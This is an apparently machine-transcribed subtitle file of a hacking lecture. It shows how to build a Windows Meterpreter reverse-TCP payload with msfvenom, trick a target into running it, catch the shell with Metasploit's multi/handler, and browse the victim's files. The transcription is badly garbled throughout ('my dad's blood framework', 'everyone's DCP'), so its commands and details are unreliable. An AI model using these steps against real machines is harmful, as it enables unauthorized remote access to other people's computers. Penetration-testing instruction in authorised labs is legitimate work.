1 00:00:07,870 --> 00:00:13,300 Welcome in this lecture we're going to see how to hack this machine with the help of my dad's blood 2 00:00:13,300 --> 00:00:15,360 framework. 3 00:00:15,390 --> 00:00:20,690 So basically here the attacker went to create a payload and send it to the machine. 4 00:00:20,790 --> 00:00:26,010 When you click on the payload file the better is to be treated for the attacker. 5 00:00:27,170 --> 00:00:30,430 First we need to create a payload file for the machine. 6 00:00:30,940 --> 00:00:41,650 So go to MIT applied framework and type Ruby MSF venom hyphen B windows slash interpreter slash everyone's 7 00:00:41,700 --> 00:00:52,410 DCP and hoist one into two not one sixty eight not one not hundred because the target mission is to 8 00:00:52,420 --> 00:00:59,190 connect to our machine now and by the local port police and on machine 9 00:01:02,030 --> 00:01:09,240 as we know that we are creating a payload with the ELC extension so using the highpoint if to indicate 10 00:01:09,240 --> 00:01:15,920 to the file extension and left you the name and part of the file where you want to say 11 00:01:19,690 --> 00:01:23,930 as you can see the payload is created. 12 00:01:23,950 --> 00:01:27,210 Now let's take an internal storage. 13 00:01:27,330 --> 00:01:29,620 Here is our payload. 14 00:01:29,660 --> 00:01:35,330 Next we need to send this payload file typically machine to listen to the west connection from a machine 15 00:01:36,110 --> 00:01:38,520 we need to open MSF console. 16 00:01:38,540 --> 00:01:48,060 On my test flight not was there a handler type used exploit slash multi slash handler 17 00:01:51,390 --> 00:01:53,610 as you can see the handler is set. 18 00:01:53,970 --> 00:02:06,840 Now we are willing to set our payload so type set payload windows slash reporter slash rewards DCP. 19 00:02:06,940 --> 00:02:17,050 Now we need to set local Hoyt and local port so to set local hosted by set and host and to do 168. 20 00:02:17,220 --> 00:02:30,490 When not under now to set local port type set airport for 44 foot for now to start listening time run 21 00:02:32,120 --> 00:02:40,380 as you can see now we to do to listen incoming connection here again see as soon payload failed to my 22 00:02:40,590 --> 00:02:41,370 machine. 23 00:02:41,550 --> 00:02:48,830 So let's run this as against the interminable recording with repetition. 24 00:02:48,880 --> 00:02:57,910 Now you can access the machine so let's see the basic information of 50 machine type system in four. 25 00:02:58,050 --> 00:03:06,910 Here you can see the basic information of the machine now to see the commands type help here you can 26 00:03:06,910 --> 00:03:17,790 see the list of commands now detected that it is over tape the at here it is the list of it it's showing 27 00:03:17,910 --> 00:03:26,940 only desktop files because our payload is on next up so that so you can hack with machine with the help 28 00:03:26,940 --> 00:03:27,970 of my test flight.